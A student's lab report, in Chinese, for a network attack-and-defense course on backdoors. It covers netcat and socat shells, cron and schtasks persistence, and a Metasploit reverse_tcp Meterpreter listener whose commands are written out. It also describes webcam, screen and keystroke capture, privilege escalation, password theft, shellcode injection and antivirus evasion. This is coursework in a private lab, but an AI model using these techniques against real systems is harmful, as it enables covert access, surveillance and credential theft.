20212314 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212314严东波 2024-04-02 22:03:33

1.实验内容

1.1实践目标

1.2实验问题
(1)例举你能想到的一个后门进入到你系统中的可能方式？
恶意软件可能会伪装成合法软件的附件，比如某些免费的应用程序。
(2)例举你知道的后门如何启动起来(win及linux)的方式？
Windows：在注册表中设置开机自启
linux：通过crontab功能设置任务定时启动，对正常程序注入shellcode使其连带启动
(3)Meterpreter有哪些给你映像深刻的功能？
获取目标主机摄像头、截屏等功能
(4)如何发现自己有系统有没有被安装后门？
可以通过监控网络活动并查看是否有大量的数据流量发送到未知的IP地址

2.实验过程

2.1 windows下使用netcat获取kali的Shell，用cron命令启动某项任务

windows需要从从附件工具上下载ncat.rar后解压，kali直接执行nc命令后提示下载，windows和linux进入ncat.exe所在的目录后执行图示代码，windows成功获取linux的shell

用cron命令启动某项任务，首先进入root（我是直接使用root权限连接的），接着在Windows输入命令crontab -e，可以看到一堆乱码，在kali的/var/spool/cron/crontabs/目录下可以看到文件（我将crontabs文件的权限更改了，所以可以直接进去）

之后运行echo “* * * * * * echo “2314” >> /home/kali/sy2/20212314ys2.txt” >> /var/spool/cron/crontabs/root该命令，在crontabs下的用户任务文件里添加一项任务，并通过crontab -l查询任务内容，可以看到任务添加成功

2.2 kali下使用socat获取windows的Shell, 用schtasks命令创建并启动某项任务计划

在实验开始前需要将防火墙和Windows安全中心关闭

接着使用socat获取windows的Shell，如图获取成功

用schtasks命令创建并启动某项任务计划，下面是我的C语言代码，向D:\20212314.txt中写入20212314ydb!

通过输入schtasks命令创建一个名为“Test20212314”的任务，每隔一分钟就会执行上述程序，通过windows可以查看到它的任务计划

schtasks /create /sc minute /mo 1 /tn “Test20212314” /tr D:\studys\Ccode\Cstart\homework\test1.exe

2.3 使用MSF meterpreter生成后门文件，利用ncat或socat传送到主机并运行，获取主机Shell

确定主机和虚拟机能相互ping通

使用MSF meterpreter生成后门文件，并利用ncat或socat将后门文件传送到主机

进入kali的MSF控制台，开始准备监听

msfconsole    //进入MSF控制台
use exploit/multi/handler    //使用监听模块
set payload windows/meterpreter/reverse_tcp    //使用和生成后门程序时相同的payload
set LHOST 192.168.246.130    //和之前生成后门程序时设置的kali的IP相同
set LPORT 2314    //和之前生成后门程序时设置的端口相同
show options    //显示参数配置情况，检查参数是否正确设置
exploit    //开启监听

kali保持监听，windows start 20212314_backdoor.exe，成功获取shell

2.4 使用MSF meterpreter生成后门文件，获取目标主机音频、摄像头、击键记录等内容，并尝试提权

获取系统信息、当前屏幕，摄像头抓拍照片

尝试提权并获取密码，成功

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

使用MSF生成shellcode，在Linux将获取shell的攻击代码写入pwn1，最终生成一个20212314pwn文件

在kali中打开另一个终端，进行监听操作，成功获取shell，之后在开始的终端中执行20212314pwn，可以看到成功获取了shell

3.问题及解决方案

crontab -e无法编辑任务内容，使用echo代码也无法创建文件。解决方式是直接先写入代码

关了防火墙但忘记关Windows安全中心，传输的后门文件被截杀
仍旧是文件权限问题，出现的各种和文件相关的问题都可以先试试先修改文件的权限chmod +755 文件名

4.学习感悟、思考

这次实验开始接触netcat、socat和MSF这些工具的使用，实验开始得比较晚，有不少同学的实验报告去借鉴，出现的很多错误也多大能找到相应的解决方式。这次实验给我带来的收获有很多，尤其是黑客的体验，攻击的同时也让我提高了警惕心理。此外，本次实验我还了解了一些免杀技术，例如使用msfvenom生成后门代码、使用socat绕过检测等。